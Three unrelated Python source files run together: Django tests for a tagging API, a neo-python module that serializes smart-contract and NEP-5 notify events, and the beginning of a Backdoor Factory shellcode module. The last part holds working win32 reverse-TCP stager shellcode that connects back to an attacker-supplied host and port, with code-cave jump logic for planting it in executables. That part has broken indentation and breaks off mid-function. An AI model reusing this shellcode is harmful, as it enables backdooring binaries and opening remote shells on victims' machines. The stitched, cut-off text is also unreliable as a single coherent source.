        self.assertEqual(response.status_code, 204)
        self.assertEqual(Tag.objects.count(), count_before - 1)

    def test_update(self):
        # renaming an existing tag is rejected with 405 Method Not Allowed
        tag = TagFactory()
        response = self.client.patch('/api/tags/%d/' % tag.pk, {'label': 'new name'})
        self.assertEqual(response.status_code, 405)
class TaggedItemViewSetTestCase(TestCase):
    """API tests for the tagged-item viewset.

    Listing requires both ``content_type`` and ``object_id``; create
    enforces label rules and duplicate detection; delete and lock/unlock
    honor the ``locked`` flag.
    """
    def setUp(self):
        self.user = UserFactory()
    def test_list_with_no_parameter(self):
        # both filter parameters missing -> bad request
        r = self.client.get('/api/tagged_items/')
        self.assertEqual(r.status_code, 400)
    def test_list_with_object_id_only(self):
        # object_id alone is ambiguous across models -> bad request
        article0 = TagTestArticle0Factory()
        TaggedItemFactory(content_object=article0)
        r = self.client.get('/api/tagged_items/', {'object_id': article0.pk})
        self.assertEqual(r.status_code, 400)
    def test_list_with_content_type_only(self):
        # content_type alone does not identify an object -> bad request
        article0 = TagTestArticle0Factory()
        TaggedItemFactory(content_object=article0)
        ct = ContentType.objects.get_for_model(article0)
        r = self.client.get('/api/tagged_items/', {'content_type': ct.pk})
        self.assertEqual(r.status_code, 400)
    def test_list_with_object(self):
        # full serialization check, including the content_object URL taken
        # from get_absolute_url (patched in for article0, absent for article1)
        article0 = TagTestArticle0Factory()
        article1 = TagTestArticle1Factory()
        tagged_item0 = TaggedItemFactory(content_object=article0)
        tagged_item1 = TaggedItemFactory(content_object=article0)
        tagged_item2 = TaggedItemFactory(content_object=article1)
        ct0 = ContentType.objects.get_for_model(article0)
        ct1 = ContentType.objects.get_for_model(article1)
        with patch.object(TagTestArticle0, 'get_absolute_url', create=True, return_value='/absolute_url/'):
            r = self.client.get('/api/tagged_items/', {'content_type': ct0.pk, 'object_id': article0.pk})
            self.assertEqual(r.status_code, 200)
            self.assertEqual(len(r.data), 2)
            self.assertEqual(r.data[0]['id'], tagged_item0.pk)
            self.assertEqual(r.data[1]['id'], tagged_item1.pk)
            self.assertEqual(r.data[0], {
                'id': tagged_item0.pk,
                'content_type': tagged_item0.content_type.pk,
                'object_id': tagged_item0.object_id,
                'content_object': {
                    'content_type': tagged_item0.content_type.pk,
                    'object_id': tagged_item0.object_id,
                    'str': str(tagged_item0.content_object),
                    'url': '/absolute_url/'
                },
                'author': tagged_item0.author.pk,
                'locked': False,
                'created_at': tagged_item0.created_at.isoformat(),
                'tag': {
                    'label': tagged_item0.tag.label,
                    'id': tagged_item0.tag.pk,
                    'url': '/%s/' % quote(tagged_item0.tag.label)
                },
                'detail_api_url': '/api/tagged_items/%d/' % tagged_item0.pk,
                'lock_api_url': '/api/tagged_items/%d/lock/' % tagged_item0.pk,
                'unlock_api_url': '/api/tagged_items/%d/unlock/' % tagged_item0.pk,
            })
        # article1's model has no get_absolute_url -> serialized url is None
        r = self.client.get('/api/tagged_items/', {'content_type': ct1.pk, 'object_id': article1.pk})
        self.assertEqual(r.status_code, 200)
        self.assertEqual(len(r.data), 1)
        self.assertEqual(r.data[0]['id'], tagged_item2.pk)
        self.assertEqual(r.data[0], {
            'id': tagged_item2.pk,
            'content_type': tagged_item2.content_type.pk,
            'object_id': tagged_item2.object_id,
            'content_object': {
                'content_type': tagged_item2.content_type.pk,
                'object_id': tagged_item2.object_id,
                'str': str(tagged_item2.content_object),
                'url': None
            },
            'author': tagged_item2.author.pk,
            'locked': False,
            'created_at': tagged_item2.created_at.isoformat(),
            'tag': {
                'label': tagged_item2.tag.label,
                'id': tagged_item2.tag.pk,
                'url': '/%s/' % quote(tagged_item2.tag.label)
            },
            'detail_api_url': '/api/tagged_items/%d/' % tagged_item2.pk,
            'lock_api_url': '/api/tagged_items/%d/lock/' % tagged_item2.pk,
            'unlock_api_url': '/api/tagged_items/%d/unlock/' % tagged_item2.pk,
        })
    def test_retrieve(self):
        # individual retrieval is not exposed -> 405 Method Not Allowed
        tagged_item = TaggedItemFactory()
        r = self.client.get('/api/tagged_items/%d/' % tagged_item.pk)
        self.assertEqual(r.status_code, 405)
    def test_create_with_new_tag(self):
        # posting an unknown label creates both the tag and the tagged item
        item_count = TaggedItem.objects.count()
        tag_count = Tag.objects.count()
        article = TagTestArticle0Factory()
        ct = ContentType.objects.get_for_model(article)
        r = self.client.post('/api/tagged_items/', {'tag': 'new tag', 'object_id': article.pk, 'content_type': ct.pk})
        self.assertEqual(r.status_code, 201)
        self.assertEqual(TaggedItem.objects.count(), item_count + 1)
        self.assertEqual(Tag.objects.count(), tag_count + 1)
        tagged_item = TaggedItem.objects.all()[0]
        self.assertIsNone(tagged_item.author)
    def test_create_with_exist_tag(self):
        # posting an existing label reuses the tag (tag count unchanged)
        TagFactory(label='exist tag')
        article = TagTestArticle0Factory()
        ct = ContentType.objects.get_for_model(article)
        item_count = TaggedItem.objects.count()
        tag_count = Tag.objects.count()
        r = self.client.post('/api/tagged_items/', {'tag': 'exist tag', 'object_id': article.pk, 'content_type': ct.pk})
        self.assertEqual(r.status_code, 201)
        self.assertEqual(TaggedItem.objects.count(), item_count + 1)
        self.assertEqual(Tag.objects.count(), tag_count)
        tagged_item = TaggedItem.objects.all()[0]
        self.assertIsNone(tagged_item.author)
    def test_create_with_already_added(self):
        # the factory call below pre-creates the duplicate tagging
        article = TagTestArticle0Factory()
        ct = ContentType.objects.get_for_model(article)
        item = TaggedItemFactory(content_object=article, tag__label='already added')
        r = self.client.post('/api/tagged_items/', {'tag': 'already added', 'object_id': article.pk, 'content_type': ct.pk})
        self.assertEqual(r.status_code, 400)
        self.assertEqual(r.data, "'already added' is already added.")
    def test_create_with_empty_label(self):
        article = TagTestArticle0Factory()
        ct = ContentType.objects.get_for_model(article)
        r = self.client.post('/api/tagged_items/', {'tag': '', 'object_id': article.pk, 'content_type': ct.pk})
        self.assertEqual(r.status_code, 400)
        self.assertEqual(r.data, 'Tag label is required.')
    def test_create_with_author(self):
        # authenticated requests record the requesting user as author
        self.client.login(username=self.user.username, password='password')
        item_count = TaggedItem.objects.count()
        tag_count = Tag.objects.count()
        article = TagTestArticle0Factory()
        ct = ContentType.objects.get_for_model(article)
        r = self.client.post('/api/tagged_items/', {'tag': 'new tag', 'object_id': article.pk, 'content_type': ct.pk})
        self.assertEqual(r.status_code, 201)
        self.assertEqual(TaggedItem.objects.count(), item_count + 1)
        self.assertEqual(Tag.objects.count(), tag_count + 1)
        tagged_item = TaggedItem.objects.all()[0]
        self.assertEqual(tagged_item.author, self.user)
    def test_update(self):
        # direct PATCH is not allowed; state changes go via lock/unlock
        item = TaggedItemFactory()
        r = self.client.patch('/api/tagged_items/%d/' % item.pk, {'locked': False})
        self.assertEqual(r.status_code, 405)
    def test_delete(self):
        item = TaggedItemFactory()
        count = TaggedItem.objects.count()
        r = self.client.delete('/api/tagged_items/%d/' % item.pk)
        self.assertEqual(r.status_code, 204)
        self.assertEqual(TaggedItem.objects.count(), count - 1)
    def test_delete_with_locked(self):
        # locked items cannot be deleted
        item = TaggedItemFactory(locked=True)
        count = TaggedItem.objects.count()
        r = self.client.delete('/api/tagged_items/%d/' % item.pk)
        self.assertEqual(r.status_code, 400)
        self.assertEqual(TaggedItem.objects.count(), count)
    def test_lock(self):
        self.client.login(username=self.user.username, password='password')
        item = TaggedItemFactory()
        r = self.client.patch('/api/tagged_items/%d/lock/' % item.pk)
        self.assertEqual(r.status_code, 200)
        self.assertTrue(TaggedItem.objects.get(pk=item.pk).locked)
    def test_lock_for_locked_item(self):
        # locking twice is an error; the item stays locked
        self.client.login(username=self.user.username, password='password')
        item = TaggedItemFactory(locked=True)
        r = self.client.patch('/api/tagged_items/%d/lock/' % item.pk)
        self.assertEqual(r.status_code, 400)
        self.assertTrue(TaggedItem.objects.get(pk=item.pk).locked)
    def test_unlock(self):
        self.client.login(username=self.user.username, password='password')
        item = TaggedItemFactory(locked=True)
        r = self.client.patch('/api/tagged_items/%d/unlock/' % item.pk)
        self.assertEqual(r.status_code, 200)
        self.assertFalse(TaggedItem.objects.get(pk=item.pk).locked)
    def test_unlock_for_unlocked_item(self):
        # unlocking an unlocked item is an error; the item stays unlocked
        self.client.login(username=self.user.username, password='password')
        item = TaggedItemFactory()
        r = self.client.patch('/api/tagged_items/%d/unlock/' % item.pk)
        self.assertEqual(r.status_code, 400)
        self.assertFalse(TaggedItem.objects.get(pk=item.pk).locked)
|
|
from neo.Core.IO.BinaryWriter import BinaryWriter
from neo.Core.IO.BinaryReader import BinaryReader
from neo.Core.UInt160 import UInt160
from neo.Core.BigInteger import BigInteger
from neo.Core.Cryptography.Crypto import Crypto
from neo.IO.MemoryStream import StreamManager
from neo.SmartContract.ContractParameter import ContractParameter, ContractParameterType
from neo.Core.IO.Mixins import SerializableMixin
import binascii
from neo.Core.State.ContractState import ContractState
from neo.logging import log_manager
logger = log_manager.getLogger('vm')
class SmartContractEvent(SerializableMixin):
    """
    SmartContractEvent is sent as argument to all smart contract event handlers. It
    includes all the information about the current event, such as type, payload,
    contract hash, transaction hash, and block number.
    - event_type (str)
    - contract_hash (UInt160)
    - tx_hash (UInt256)
    - block_number (int)
    - event_payload (object[])
    - execution_success (bool)
    - test_mode (bool)
    `event_payload` is always a list of object, depending on what data types you sent
    in the smart contract.
    """
    # event-type constants; the ".*" entries are wildcard subscriptions
    RUNTIME_NOTIFY = "SmartContract.Runtime.Notify"  # payload: object[]
    RUNTIME_LOG = "SmartContract.Runtime.Log"  # payload: bytes
    EXECUTION = "SmartContract.Execution.*"
    EXECUTION_INVOKE = "SmartContract.Execution.Invoke"
    EXECUTION_SUCCESS = "SmartContract.Execution.Success"
    EXECUTION_FAIL = "SmartContract.Execution.Fail"
    VERIFICATION = "SmartContract.Verification.*"
    VERIFICATION_SUCCESS = "SmartContract.Verification.Success"
    VERIFICATION_FAIL = "SmartContract.Verification.Fail"
    STORAGE = "SmartContract.Storage.*"
    STORAGE_GET = "SmartContract.Storage.Get"
    STORAGE_PUT = "SmartContract.Storage.Put"
    STORAGE_DELETE = "SmartContract.Storage.Delete"
    CONTRACT = "SmartContract.Contract.*"
    CONTRACT_CREATED = "SmartContract.Contract.Create"
    CONTRACT_MIGRATED = "SmartContract.Contract.Migrate"
    CONTRACT_DESTROY = "SmartContract.Contract.Destroy"
    def __init__(self, event_type, event_payload, contract_hash, block_number, tx_hash, execution_success=False, test_mode=False):
        # a non-empty payload must already be wrapped in a ContractParameter
        if event_payload and not isinstance(event_payload, ContractParameter):
            raise Exception("Event payload must be ContractParameter")
        self.event_type = event_type
        self.event_payload = event_payload
        self.contract_hash = contract_hash
        self.block_number = block_number
        self.tx_hash = tx_hash
        self.execution_success = execution_success
        self.test_mode = test_mode
        self.token = None
        self.contract = None
        # normalize an empty/None payload to an empty Array parameter
        if not self.event_payload:
            self.event_payload = ContractParameter(ContractParameterType.Array, value=[])
        # create/migrate events carry the ContractState as an interop payload
        if self.event_type in [SmartContractEvent.CONTRACT_CREATED, SmartContractEvent.CONTRACT_MIGRATED]:
            if self.event_payload.Type == ContractParameterType.InteropInterface:
                self.contract = self.event_payload.Value
    def Serialize(self, writer):
        """Write header (type, contract hash, block, tx) then the payload."""
        writer.WriteVarString(self.event_type.encode('utf-8'))
        writer.WriteUInt160(self.contract_hash)
        writer.WriteUInt32(self.block_number)
        writer.WriteUInt256(self.tx_hash)
        self.SerializePayload(writer)
    def SerializePayload(self, writer):
        """Write the event-type specific payload (overridden in subclasses)."""
        # only create/migrate events persist contract (and optional token) state
        if self.event_type in [SmartContractEvent.CONTRACT_CREATED, SmartContractEvent.CONTRACT_MIGRATED] and self.contract:
            self.contract.Serialize(writer)
            if self.token:
                self.token.Serialize(writer)
    def Deserialize(self, reader):
        """Read back the fields written by Serialize, in the same order."""
        self.event_type = reader.ReadVarString().decode('utf-8')
        self.contract_hash = reader.ReadUInt160()
        self.block_number = reader.ReadUInt32()
        self.tx_hash = reader.ReadUInt256()
        self.DeserializePayload(reader)
    def DeserializePayload(self, reader):
        """Read the event-type specific payload (overridden in subclasses)."""
        if self.event_type in [SmartContractEvent.CONTRACT_CREATED, SmartContractEvent.CONTRACT_MIGRATED]:
            self.contract = ContractState()
            self.contract.Deserialize(reader)
            # token data is optional; best-effort read (import is local to
            # avoid a circular dependency at module load time)
            try:
                from neo.Wallets.NEP5Token import NEP5Token
                token = NEP5Token(binascii.hexlify(self.contract.Code.Script))
                token.Deserialize(reader)
                self.token = token
            except Exception as e:
                logger.debug("Couldnt deserialize token %s " % e)
    def __str__(self):
        return "SmartContractEvent(event_type=%s, event_payload=%s, contract_hash=%s, block_number=%s, tx_hash=%s, execution_success=%s, test_mode=%s)" \
               % (self.event_type, self.event_payload, self.contract_hash, self.block_number, self.tx_hash, self.execution_success, self.test_mode)
    def ToByteArray(self):
        """Serialize this event into a fresh byte string."""
        stream = StreamManager.GetStream()
        writer = BinaryWriter(stream)
        self.Serialize(writer)
        out = stream.getvalue()
        StreamManager.ReleaseStream(stream)
        return out
    @staticmethod
    def FromByteArray(data):
        """Deserialize an event, dispatching Runtime.Notify to NotifyEvent."""
        stream = StreamManager.GetStream(data=data)
        reader = BinaryReader(stream)
        # peek at the event type to pick the concrete class, then rewind
        etype = reader.ReadVarString().decode('utf-8')
        reader.stream.seek(0)
        if etype == SmartContractEvent.RUNTIME_NOTIFY:
            event = NotifyEvent(None, None, None, None, None)
        else:
            event = SmartContractEvent(None, None, None, None, None)
        event.Deserialize(reader)
        StreamManager.ReleaseStream(stream)
        return event
    def CheckIsNEP5(self):
        # adopt the contract's parsed NEP5 token, if it has one
        if self.contract and self.contract.IsNEP5Contract:
            self.token = self.contract._nep_token
    def ToJson(self):
        """Return a JSON-serializable dict representation of the event."""
        jsn = {
            'type': self.event_type,
            'contract': self.contract_hash.To0xString(),
            'block': self.block_number,
            'tx': self.tx_hash.To0xString()
        }
        if self.event_type in [SmartContractEvent.CONTRACT_CREATED, SmartContractEvent.CONTRACT_MIGRATED]:
            # replace the hash with the full contract JSON (minus the script blob)
            jsn['contract'] = self.contract.ToJson()
            del jsn['contract']['script']
            if self.token:
                jsn['token'] = self.token.ToJson()
        return jsn
class NotifyType:
    """Well-known first elements of NEP-5 Runtime.Notify payloads."""
    TRANSFER = b'transfer'  # OnTransfer = RegisterAction('transfer', 'to', 'from', 'amount')
    APPROVE = b'approve'  # OnApprove = RegisterAction('approve', 'addr_from', 'addr_to', 'amount')
    REFUND = b'refund'  # OnRefund = RegisterAction('refund', 'to', 'amount')
    MINT = b'mint'  # OnMint = RegisterAction('mint', 'addr_to', 'amount')
class NotifyEvent(SmartContractEvent):
    """A Runtime.Notify event, with NEP-5 transfer/approve/refund/mint
    payloads parsed into addr_from / addr_to / amount."""
    notify_type = None
    addr_to = None
    addr_from = None
    amount = 0
    is_standard_notify = False
    @property
    def ShouldPersist(self):
        # only real (non test-mode) standard notifications are persisted
        return self.is_standard_notify and not self.test_mode
    @property
    def Type(self):
        return self.notify_type.decode('utf-8')
    @property
    def AddressTo(self):
        if self.addr_to:
            return Crypto.ToAddress(self.addr_to)
        return None
    @property
    def AddressFrom(self):
        if self.addr_from:
            return Crypto.ToAddress(self.addr_from)
        return None
    @property
    def Contract(self):
        return self.contract_hash
    @property
    def Amount(self):
        return self.amount
    def __init__(self, event_type, event_payload, contract_hash, block_number, tx_hash, execution_success=False, test_mode=False):
        super(NotifyEvent, self).__init__(event_type, event_payload, contract_hash, block_number, tx_hash, execution_success, test_mode)
        self.is_standard_notify = False
        if self.event_payload.Type == ContractParameterType.Array and len(self.event_payload.Value) > 0:
            payload = self.event_payload.Value
            plen = len(payload)
            # first array element names the notification kind
            self.notify_type = payload[0].Value
            empty = UInt160(data=bytearray(20))
            try:
                if plen == 4 and self.notify_type in [NotifyType.TRANSFER, NotifyType.APPROVE]:
                    # a None/False source means the contract itself sent it
                    if payload[1].Value is None:
                        self.addr_from = empty
                        logger.debug("Using contract addr from address %s " % self.event_payload)
                    elif payload[1].Value is False:
                        logger.debug("Using contract addr from address %s " % self.event_payload)
                        self.addr_from = empty
                    else:
                        self.addr_from = UInt160(data=payload[1].Value) if len(payload[1].Value) == 20 else empty
                    self.addr_to = UInt160(data=payload[2].Value) if len(payload[2].Value) == 20 else empty
                    self.amount = int(BigInteger.FromBytes(payload[3].Value)) if isinstance(payload[3].Value, (bytes, bytearray)) else int(payload[3].Value)
                    self.is_standard_notify = True
                elif self.notify_type == NotifyType.REFUND and plen >= 3:  # Might have more arguments
                    self.addr_to = UInt160(data=payload[1].Value) if len(payload[1].Value) == 20 else empty
                    self.amount = int(BigInteger.FromBytes(payload[2].Value)) if isinstance(payload[2].Value, (bytes, bytearray)) else int(payload[2].Value)
                    self.addr_from = self.contract_hash
                    self.is_standard_notify = True
                elif self.notify_type == NotifyType.MINT and plen == 3:
                    self.addr_to = UInt160(data=payload[1].Value) if len(payload[1].Value) == 20 else empty
                    self.amount = int(BigInteger.FromBytes(payload[2].Value)) if isinstance(payload[2].Value, (bytes, bytearray)) else int(payload[2].Value)
                    self.addr_from = self.contract_hash
                    self.is_standard_notify = True
            except Exception as e:
                logger.debug("Could not determine notify event: %s %s" % (e, self.event_payload))
        elif self.event_payload.Type == ContractParameterType.String:
            self.notify_type = self.event_payload.Value
        # else:
        #     logger.debug("NOTIFY %s %s" % (self.event_payload.Type, self.event_payload.Value))
    def SerializePayload(self, writer):
        """Write notify type plus, for standard notifies, from/to/amount."""
        writer.WriteVarString(self.notify_type)
        if self.is_standard_notify:
            writer.WriteUInt160(self.addr_from)
            writer.WriteUInt160(self.addr_to)
            # clamp the amount into the unsigned 64-bit varint range
            if self.Amount < 0:
                logger.debug("Transfer Amount less than 0")
                writer.WriteVarInt(0)
            elif self.Amount < 0xffffffffffffffff:
                writer.WriteVarInt(self.amount)
            else:
                logger.debug("Writing Payload value amount greater than ulong long is not allowed. Setting to ulong long max")
                writer.WriteVarInt(0xffffffffffffffff)
    def DeserializePayload(self, reader):
        """Read back the fields written by SerializePayload."""
        try:
            self.notify_type = reader.ReadVarString()
        except Exception as e:
            logger.debug("Could not read notify type")
        # Bug fix: NotifyType.MINT was missing from this list even though
        # __init__ marks mint notifications as standard and
        # SerializePayload writes addr_from/addr_to/amount for them, so
        # round-tripping a mint event silently dropped the transfer data.
        if self.notify_type in [NotifyType.REFUND, NotifyType.APPROVE, NotifyType.TRANSFER, NotifyType.MINT]:
            try:
                self.addr_from = reader.ReadUInt160()
                self.addr_to = reader.ReadUInt160()
                self.amount = reader.ReadVarInt()
                self.is_standard_notify = True
            except Exception as e:
                logger.debug("Could not transfer notification data")
    def ToJson(self):
        """Extend the base JSON with the parsed notification fields."""
        jsn = super(NotifyEvent, self).ToJson()
        jsn['notify_type'] = self.Type
        jsn['addr_to'] = self.AddressTo
        jsn['addr_from'] = self.AddressFrom
        jsn['amount'] = "%s" % self.Amount
        return jsn
|
|
'''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import sys
import struct
from intelmodules import eat_code_caves
class winI32_shellcode():
"""
Windows Intel x32 shellcode class
"""
def __init__(self, HOST, PORT, SUPPLIED_SHELLCODE):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.shellcode = ""
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
return False
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
    def returnshellcode(self):
        # accessor for the fully assembled shellcode built by one of the
        # payload methods below
        return self.shellcode
    def reverse_tcp_stager(self, flItms, CavesPicked={}):
        """
        Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
        windows/meterpreter/reverse_tcp payloads from metasploit.

        Returns (stackpreserve + shellcode1, shellcode2) so the caller can
        place the two halves in separate code caves when cave_jumping is on.
        NOTE(review): CavesPicked is a mutable default but is never read or
        mutated in this method.
        """
        if self.PORT is None:
            print ("Must provide port")
            return False
        flItms['stager'] = True
        breakupvar = eat_code_caves(flItms, 0, 1)
        #shellcode1 is the thread
        self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
                           "\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
                           "\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
                           "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
                           "\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
                           "\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
                           "\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
                           "\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
                           "\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
                           "\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
                           "\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
                           "\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
                           "\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
                           "\x5D\x90"
                           "\xBE\x22\x01\x00\x00"  # <---Size of shellcode2 in hex
                           "\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
                           "\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
                           "\x89\xF1"
                           )
        # when cave jumping, append a jmp (\xe9 + rel32) across the gap
        # between this cave and the next chunk; the offsets account for the
        # stackpreserve prologue and the 4/3 byte jump encoding itself
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                # negative distance: encode a backwards relative jump
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3)
        else:
            self.shellcode1 += "\xeb\x44"  # <--length of shellcode below
        self.shellcode1 += "\x90\x5e"
        self.shellcode1 += ("\x90\x90\x90"
                            "\xF2\xA4"
                            "\xE8\x20\x00\x00"
                            "\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
                            "\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
                            "\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
                            "\x58\x58\x90\x61"
                            )
        # second cave-jump target for the tail of shellcode1
        breakupvar = eat_code_caves(flItms, 0, 2)
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
                                               len(self.shellcode1) - 3).rstrip("L")), 16))
        else:
            self.shellcode1 += "\xE9\x27\x01\x00\x00"
        #Begin shellcode 2:
        # shellcode2 starts with a call (\xe8) back into shellcode1's
        # copy loop; offsets mirror the jump math above
        breakupvar = eat_code_caves(flItms, 0, 1)
        if flItms['cave_jumping'] is True:
            self.shellcode2 = "\xe8"
            if breakupvar > 0:
                if len(self.shellcode2) < breakupvar:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
                                                   len(self.shellcode2) + 241).rstrip("L")), 16))
                else:
                    self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
                                                   breakupvar + 241).rstrip("L")), 16))
            else:
                self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
                                               len(self.shellcode2) + 234).rstrip("L")), 16))
        else:
            self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
        #Can inject any shellcode below.
        self.shellcode2 += ("\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
                            "\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
                            "\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
                            "\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
                            "\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
                            "\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
                            "\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
                            "\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
                            "\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
                            "\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
                            "\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
                            "\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
                            "\x97\x6A\x05\x68"
                            )
        # splice the connect-back host and port into the socket setup
        self.shellcode2 += self.pack_ip_addresses()  # IP
        self.shellcode2 += ("\x68\x02\x00")
        self.shellcode2 += struct.pack('!h', self.PORT)
        self.shellcode2 += ("\x89\xE6\x6A"
                            "\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
                            "\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
                            "\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
                            "\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
                            "\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
                            )
        self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
        return (self.stackpreserve + self.shellcode1, self.shellcode2)
    def cave_miner(self, flItms, CavesPicked={}):
        """
        Sample code for finding suitable code caves.

        Emits two NOP-sled placeholders (40 and 48 bytes) wrapped in the
        register preserve/restore sequences, with the same cave-jumping
        relative-jump math as the real payload methods.
        NOTE(review): CavesPicked is a mutable default but is never read or
        mutated in this method.
        """
        breakupvar = eat_code_caves(flItms, 0, 1)
        self.shellcode1 = ""
        # optional jmp (\xe9 + rel32) from the first cave to the second
        if flItms['cave_jumping'] is True:
            self.shellcode1 += "\xe9"
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
